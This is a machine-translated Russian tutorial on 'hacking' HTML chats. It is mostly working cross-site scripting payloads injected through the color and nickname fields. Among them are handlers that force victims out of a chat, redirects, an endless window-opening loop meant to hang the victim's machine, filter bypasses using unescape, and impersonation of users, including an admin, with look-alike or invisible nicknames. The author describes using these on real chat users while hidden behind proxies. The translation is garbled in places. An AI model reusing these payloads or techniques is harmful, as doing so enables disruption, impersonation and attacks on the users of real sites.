This page has been robot translated, sorry for typos if any. Original content here.

Hacking Chat Part 1 (Theory and Practice)



  • Part 1
  • Part 2


  • This page does not in any way call for illegal activities, "crackers", etc. The main goal is to study the features of HTML and to prevent errors associated with its use. For any illegal use of the information provided, the author does not bear responsibility. About all the errors found in the chat rooms, the chat administration was informed by the author.
    All the examples given in the article are tested and work in MSIE 5.50.4134.0600. I can not guarantee the availability of other versions, but I'm sure that almost all the examples will work there.

    Glossary

    Hacking through nickname (handler without quotes)
    Hacking through the nickname (the handler is enclosed in quotation marks)
    Hacking through nickname (the filter does not skip quotes / symbols)
    Hacking through color (attribute without quotes)
    Hacking through color (attribute with quotes)
    On which symbols you need to check the filters
    Handler Limiters
    Forgery of nicknames, empty nicknames

    General theory

    Here I want to stop at the basics of hacking chats. I'm sorry before the advanced readers - these methods have long been known and old as the world. If you are sufficiently advanced, you can focus on the following chapters.

    First of all I want to note that each chat is original and unique (except for replicated copies of one tsitshka, of course). Because there are absolutely no universal ways of hacking. Almost every chat has features that need to be taken into account, and without taking into account which, stupid templates will not work.

    First of all, what do I really understand by hacking the HTML chat? This is not a banal flood, and no attacks on the IP chat. By burglary, we mean an unauthorized change to the HTML of the chat document, or access to hidden parts of it (for example, privates), i.e. such an impact on the chat, which was not provided and allowed for users. This applies not only to chats, but also to forums, guest books, etc. (where all described methods also work and even better, because these forms are protected, as a rule, worse than chats).

    All of the above applies only to HTML chats. Hacking Java chats is a separate and completely different song. I hope you can distinguish one type of chat from another :) ).

    So, we stand on the threshold of HTML chat. Let's say that we want to test it for "strength". What should I do first? First of all, we connect through an anonymous proxy (I hope you know what it is). This is necessary for two reasons: firstly, we provide our anonymity (that would be the uncle's admin not pushed on the ass), and secondly, if the admin does not like our experiments and he closes the chat window, we could switch Their proxy to other IP addresses and again go into the chat. The truth here is one thing: the entrance to some chats is not allowed through public proxies.

    Next, we need to find out what kind of weapons we have, that is, what attributes can be set by the user. As a rule, in all chats you can enter the user's nickname, as well as the user's COLOR. In addition, sometimes you can set the user's SOAP, his home page, the gender, the frequency of updating the chat, etc. In practice, such fields as color, nickname, soap and user's home page are of interest. They are inserted directly into the body of the document, and therefore it is through them that you can attack the chat. It should be noted that in some chats you need to register, and some of the attributes are set at registration, and a part - just before entering the chat (or already inside the chat). Chats with registration, as a rule, are more steeply heaped up and better protected.

    > Denote for yourself possible ways of hacking. First of all, we'll sharpen the code fragment of the form, in which the color of our messages is set (by the way, color can be set separately for both nickname and text of messages; you need to check both of them, because they can be analyzed in different ways by chat). Why are we primarily interested in color? Because the color is indicated inside the tags, in their parameters, unlike, for example, the nickname, which most often appears in the body of the tags. And for hacking a chat, we need to penetrate into the parameters of the tag, so that you can change its attributes or insert your script (sometimes of course any tags can be written simply in the text of messages, until recently it was, for example, chat.rambler chat . ru , but this option is so dumb that such chats probably no longer exist, and I do not consider it).

    We are interested in what kind of information about the color is sent to the server. The least secure string type is when the color is passed in the form of its own name. For example:

    <select name=youcolor style="width: 70px">
    <option value=blue>синий value=blue
    <option value=red>красный
    <option value=darkred>т-красный
    <option value=green>зеленый
    <option value=black>черный value=black
    <option value=lightblue>голубой value=lightblue
    </select>

    This chat, as a rule, breaks down to some extent :) . A worse option if the color is returned as a numeric code:

    <select name=youcolor style="width: 70px">
    <option value=#0000FF>синий value=#0000FF
    <option value=#AF0000>красный
    <option value=#FF0000>т-красный
    <option value=green>зеленый
    <option value=#000000>черный value=#000000
    <option value=#0000AF>голубой value=#0000AF
    </select>

    In such a chat, perhaps , there are filters on all symbols except digits, the # sign and the letters A, B, C, D, E and F. Then we have to forget about hacking through the color.

    And finally the worst option, when the color is simply transferred as a number from the list of acceptable colors:

    <select name=youcolor style="width:70px">
    <option value=1>синий <
    <option value=2>красный <
    <option value=3>т-красный <
    <option value=4>зеленый <
    <option value=5>черный <
    <option value=6>голубой <
    </select>

    As a rule, such a chat through color can not be hacked (and often even impossible). This is the most secure option (by the way, I recommend chat developers).

    Next, we need to change the HTML code so that we can freely send arbitrary values ​​of attributes to the server. To do this, save the site on your disk and change the login form to chat (or register) in the following way: change the relative address of the form action parameter to the full address. We replace all tags of type hidden with type text , and select tags with input . In addition, you need to remove the restrictions on the length of the input value (if any). For example, if the original form had the form:



    <form name="logon" method="POST" action="/cgi-bin/chat/chat.cgi">
    <table cellspacing="0" cellpadding="0">
    <tr>

    <td valign="middle">
    <small>Nickname:</small>
    <input type="text" name="username" size="12" maxlength="12" >
    </td>

    <td valign="middle"><small> TextColor:</small>
    <select name="color">

    <option selected value="black">black
    <option selected value="red">red
    <option selected value="blue">blue
    </select>

    </td>
    <td valign="middle">

    <small>
    <input type=submit value="Join Chat">
    </small>
    </td>

    <input type=hidden name=message value="logged on.">

    <input type=hidden name="logon" value="">
    <input type=hidden name=to value="Room">
    <input type=hidden name=frames value="yes">

    </td>
    </tr>
    </table>

    </form>


    Then after the appropriate substitutions, we get:



    <form name="logon" method="POST" action="http://typachat.ru/cgi-bin/chat/chat.cgi">

    <table cellspacing="0" cellpadding="0">
    <tr>

    <td valign="middle"><small>Nickname:</small>

    <input type="text" name="username" >

    </td>

    <td valign="middle"><small> Text Color:</small>

    <input name="color">

    <option selected value="black">black
    <option selected value="red">red
    <option selected value="blue">blue

    </select>

    </td>
    <td valign="middle">

    <small>
    <input type=submit value="Join Chat">
    </small>
    </td>

    <input type=text name=message value="logged on.">

    <input type=text name="logon" value="">

    <input type=text name=to value="Room">
    <input type=text name=frames value="yes">

    </td>
    </tr>
    </table>

    </form>


    Note that a document can be created dynamically via functions like document.write () , then, most likely, you'll have to convert it to a static view. In addition, it often happens that after saving HTML to disk, the chat does not want to open. This can be caused by the fact that the site was not completely saved, if it consisted of frames. In this case, you need to better understand the structure of the page and keep everything right. Another reason may be that the server keeps track of the referer field of the request header of the http, and it detects that we are not coming from its page. In this case, you need to use other methods, which we will discuss in the chapter "Hacking at the level of http".

    Now we can experiment with chat. First of all you need to find out which filters are at the input values ​​(first for color and nickname). We are primarily interested in the following symbols:

    " ' ` = < > ; \ & % пробел " ' ` = < > ; \ & % пробел " ' ` = < > ; \ & % пробел " ' ` = < > ; \ & % пробел " ' ` = < > ; \ & % пробел " ' ` = < > ; \ & % пробел " ' ` = < > ; \ & % пробел " ' ` = < > ; \ & % пробел " ' ` = < > ; \ & % пробел " ' ` = < > ; \ & % пробел " ' ` = < > ; \ & % пробел

    We enter them into the color field and the nickname, go into the chat room (if we are allowed to go there with such attributes, if not, we'll have to go through the characters one by one), and see what symbols were missed by the filter (writing to the chat that "hello" thread, and having shamed in the HTML text what color and nick symbols are present). Some chat rooms simply delete the filtered characters, some replace them with other symbols, and some convert to an encoded form of the type < or ' . Such transformed symbols do not suit us, since HTML does not accept them (however, for more details see the chapter "A few more hacking of the long-suffering T chat").

    As a result, we must have a list of characters to be skipped for each attribute of the registration form.

    Next, we have the task of getting inside any tag in order to change its pramatra or insert its script there. There are two fundamentally different ways to do this: the first is that the code we need is passed through attributes that are already inside the tag (ie between the angle brackets) - for example, through the color or address of the soap. The second is to break the structure of HTML code in such a way that the code we need is inside the tag. How to do this is determined by analyzing the concrete structure of the chat code and the set of unfiltered symbols for our attributes. We will consider various variants of hacking in the following examples. In the meantime, I would like to dwell on some features of HTML, which actually allow you to produce interesting "effects."

    HTML Features

    P> Here I am not going to lecture on HTML for teapots. I hope that you know what a tag and its parameters are, are familiar with JavaScript and have written at least one web page in your life on HTML (and not in FrontPage).

    The biggest trouble (and at the same time, the strength) of HTML is that it does not have a single standard. That is, it seems to be there, but the standards are so diverse, and there are so many intertwined in HTML that no one thoroughly knows it (and often does not know what it is). In addition, the competition among browsers and the heterogeneity of sites leads to the fact that browsers try to support as many standards and technologies as possible. And the lack of common standards has led to the fact that web masters even on one page manage to mix in different ways in different styles: o (.However, this allows hackers to hack HTML, and gives a lot of headaches to developers.

    A simple question: what are the delimiters in HTML and JavaScript? Even I can not immediately and unequivocally answer this question. Let's consider an example:

    <font onclick= "alert()">Text</font>

    Here everything is clear and obvious. There is a tag that has a click event handler written in JavaScript, the text of which is enclosed in double quotes. The fact that JavaScript is used can be specified explicitly:

    <font onclick="javascript:alert()">Text</font>

    The delimiters of the string in these examples are double quotes. However, you can do without them. Since after onclick = only a static handler string can go, HTML allows to omit quotes (this applies to many cases where the argument can only be a string-constant). So this design also works:

    <font onclick=alert()>Text</font>

    and now instead of an empty message we will insert something meaningful:

    <font onclick=alert('Привет друзья!')>Text</font>

    Opening the demonstration link shows that this example does not work. The reason is this: the body of the handler can be not enclosed in quotation marks, but in that case the first space is considered the end of the line-handler (even if the space itself is inside the quotes). Therefore, the browser considers the processor to be only an alert fragment ('Hello , and finding an open quotation marks an error message, why does the browser not respond to the space inside the quotes? I think the reason is that there are two languages ​​mixed here: HTML and JavaScript. The browser "saw" that there was no quotation mark after the sign and therefore looked for a space as the end of the handler, but the interior of the handler did not interest him at that moment, since it did not refer to HTML, but to JavaScript. took a space after a horse The values ​​of the following parameters work without errors:

    <font onclick="alert('Привет друзья!')">Text</font>
    <font onclick=alert('Привет_друзья!')>Text</font>
    <font onclick="alert('Привет друзья!')"onmouseover='alert()'>Text</font>
    <font color=alert('Привет друзья!')>Text</font>

    Note an important feature: if the value of the tag parameter is in quotation marks, then the space before the next parameter can be omitted (the third line of the example). The fourth line of the example also works (in the sense that the browser does not swear, but the script of course does not work), because the browser does not consider the contents of the JavaScript attribute color , and therefore does not swear on an open quote, although only the alert (' Hi (as the color in HTML can be an arbitrary string, in this case the browser converts the string into a certain numerical value which is considered a color).

    Whether there are other characters - delimiters of the processor without quotes (except for a blank and a symbol > ) a question open. I do not know such people, but I admit that they can be.

    As you can see from the examples above, line delimiters can be double and single quotes. This applies equally to HTML and JavaScript, however, it turns out there is at least one more character that is a string delimiter in HTML (but not in JavaScript!). This is the character of the inverse apostrophe ` (usually located on one key with the letter E ). You can verify the following example:

    <font onclick=`alert('Привет друзья!')`>Text</font>

    I swear that at least 90% of webmasters do not know about it! In any case, I have not yet seen that anyone would use a reverse apostrophe. This symbol is a godsend :) ).

    It often happens that it is necessary to use inside quotation marks - others. And this is difficult, especially if the chat skips only one kind of quotes. But it turns out JavaScript allows you to insert string constants inside other string constants, and at the same time using the same quotes! For example:

    'javascript:st='Фиг вам';document.oncontextmenu=new Function('event.returnValue=alert(st)*0')'

    The example uses nested single quotes, but the error interpreter does not. I note that the contents of internal quotes are not arbitrary: they should not contain spaces, and at the end some symbols are not allowed, for example ; or ) .

    Now let's talk about links. First of all, it should be noted such detail: the development of the Internet was so that it mixed completely different technologies. Access to information can occur through a large number of different protocols. Therefore, when specifying the full path of the document (URL), it is allowed to specify any of the protocols familiar to the browser. It is noteworthy that javascript is also assigned to protocols (although it is not, but apparently the developers considered that it would be too bold to allocate a separate concept for scripts, and ranked them to the protocols). Therefore, wherever you can specify a URL in an HTML document, you can insert a script. And this script will run as soon as the user (or the browser itself) requests this link. For example:

    <a href=javascript:alert()>Text</a>

    Interestingly, in addition to operators, in a reference to JavaScript, you can simply specify a string (or numerical) value (however, necessarily after the operators, if any). When you click on such a link, the browser first executes the ahead operators, and then opens a new document and places the value of the last line in the link:

    <a href=javascript:alert();'Hello!!'>Text</a> I <a href=javascript:alert();'Hello!!'>Text</a> note that tags can not be inserted into a new page in this way.

    Hacking R chat

    Here is an example of one of the first hacked me chats. This chat was very simple, and hacked what is called from the first call :) ).

    And now there are not enough chats in which it passes. Although I thought of these methods myself, but then I found them in hacker magazines.

    The input form of this chat exactly corresponded to the form given in the chapter "General theory". After converting and saving the form to disk, I checked which characters in the color attribute pass. It turned out that the following symbols pass (from those that interest us-see the "General Theory" chapter):

    ' ` = ; % пробел ' ` = ; % пробел ' ` = ; % пробел ' ` = ; % пробел ' ` = ; % пробел ' ` = ; % пробел ' ` = ; % пробел ' ` = ; % пробел ' ` = ; % пробел

    Well, of course, all the numbers and letters passed. The length of the line-value of color was not limited. Next, I looked where exactly the color is inserted in the message frame. Here is a fragment of this frame:

    <font color=Black><b>Путник</b>- Alpha, привет ))</font>
    <font color=Red><b>Alpha</b>- Всемприветик !!</font>

    As you can see, the color is inserted without surrounding quotes. This suited me. I logged in under the nickname Shram (well, or almost under such a nickname;)) and the color red size = 20 . My post looked like this:

    <font color=red size=20><b>Algol</b>- Hi</font>

    It was printed in a very large font, which surprised the population of the chat :) ).

    Thus, in spite of the fact that we can not directly insert tags, but the permission to enter a space in the color attribute allowed us to specify unauthorized parameters of the tag. However, this was of course not enough for me. Change the font size of course cool, but really something useful can only be done using scripts. I could not insert the script tag directly (or rather at that time I did not yet know how to do it). But I could set the handler to some event tag. That's what color I asked for, what would remove some nerd from the chat:
    #A0A000 onmouseover=parent.frames[2].forms[0].ExitChat.click() size=30. And then I sent him a long long message to privat. The color of the message I picked up in such a way that it would not differ from the background color. And the size of the font and the length of the message were so huge that the victim probably walked at least once with the mouse on the message, as a result of which my onmouseover handler pressed the "leave chat" button instead of the user :) ).

    However, gradually there were clever men, who had figured out the trick, and deliberately did not move the cursor over the chat window. My script did not always work :( (At first I thought that there was no way out, because I can insert the script only as an event handler, then if this event does not work, then the script does not work.) But, digging into the "annals", I found a solution (now it has already become trivial and it is widely known.) It turned out that in the style attribute you can specify the URL of the wallpaper for the tag, and where you can specify the URL, you can write down the script there, and most importantly, that the background image was downloaded by itself when the HTML document was loaded! To show the alert to the chat participants, I logged in with the following color This:

    style=background-image:url(javascript:alert('приветик_всем_!!'));

    It should be noted an important detail: since the structure of most HTML chats is such that the page is updated regularly, the script sent in this way is executed more than once, and many, until our message disappears from the screen.

    But here is how the value of the color attribute for dropping out of the chat looked:

    style=background-image:url(javascript:parent.frames[2].forms[0].ExitChat.click());

    You need to remember: the script sent in private, will be seen not only by your "interlocutor", but by yourself, so you need to know how to protect yourself from the influence of the script. This can be done in two ways: either put yourself in ignore (and then we will not see your own messages), or in the browser settings to prohibit the display of pictures. Then the script that fires through the background image will not work.

    Now I want to show some useful scripts that can be used in hacked chats:

    javascript: navigate ('http://myserver.ru'); - loads myserver.ru into the current frame (or page).
    Some chats, when you see the http: // fragment, consider this as a link, and the <a> tag is automatically inserted. Since this will destroy our script, this should not be allowed. To do this, simply omit the http: prefix (which is already accepted by default). Then the script will look like this: javascript: navigate ('// myserver.ru'); . Two ahead of the slash are mandatory.

    javascript: parent.frames [2] .document.location = 'http: //myserver.ru' - loads myserver.ru into one of the frames.

    javascript: for (;;) open () - opens an infinite number of windows (if not navigated in time, it leads to the hang of the machine and the subsequent reboot).

    javascript: document.write ('<script> alert () </ script>') - replaces the current frame with a script, which is then executed. Note: if the chat does not miss the <and> (and this is the overwhelming number of chats), then we can not insert such a script. But there is a way out. This is an application of the unescape () function, which converts the ASCII code of the character into a character. We replace the angle brackets with the unescape () function with the corresponding codes, then our script will look like this:

    javascript:document.write(unescape('%3C')+'script'+unescape('%3E')+'alert()'+unescape('%3C')+'/script'+unescape('%3E')) javascript:this.insertBefore(e=document.createElement('IMG'));e.src='demo.jpg' - inserts the picture after the text. Note that in IE 5.x, you can insert any tag other than FRAME, IFRAME, and SELECT.

    But in IE 4.x, the createElement () function allows only IMG , AREA and OPTION tags to be inserted . I do not have any information about Netscape, you can experiment yourself. 'javascript:st='Фиг вам';document.oncontextmenu=new Function('event.returnValue=alert(st)*0')' / * blocks the drop-down menu of the page, and therefore makes viewing the HTML content of the frame inaccessible. Thanks to this, you can hide your machinations with the chat body :) ). * / Sometimes it is useful to log in with someone else's nickname. Chats with a user registration system will not allow you to do this if you do not know the password (and you probably do not know it). The banal output: registration with a nickname in which the letter of the Latin alphabet is replaced with a very similar letter of the Russian layout. For example, login under the nickname admin where the Latin letter a is replaced with Russian a . The method is primitive, but it works)). There are also more severe cases. For example, in some chats it is forbidden to use characters from different layouts in one nick. Then the inquisitive mind has no choice but to turn to Uncle Gates for help. And now she's kindness, Microsoft did not forget about sinful users and gave us a symbol ­ (aka ­ it's % AD ), which the microsoft company called "Soft hyphen" ("Short hyphen"). It really looks like a hyphen in Word, and in an excel too, and even in a notebook, but not in IE! For Microsoft's icon explorer ­ simply does not exist, that is, it seems to exist, but for him they forgot to make a graphic representation. It simply does not appear in the HTML page! Thus, adding a short hyphen to any nickname and registering under it, we enter the chat with the nickname, which will look on the HTML page just like the nickname without a hyphen. And you can make it even cooler - log in with a nickname that only contains short hyphen characters. Then your nickname will not be displayed in the chat at all, absolutely empty place)).

    (Note: While I was already a bit short with the short hyphen, I still found cases when it appears: It appears only as a hyphen, that is, if there is a short hyphen within the word and if this word is at the end of the line, then the word after the hyphen can be moved to the next line, and the hyphen itself becomes visible! Thus, it is possible that the hyphen is invisible - the preemptive feature of the microsoft (which does not, however, reduce its usefulness in burglary :) ). The truth is not clear why does it still remain always visible in other applications?)



    Further 2 hours >>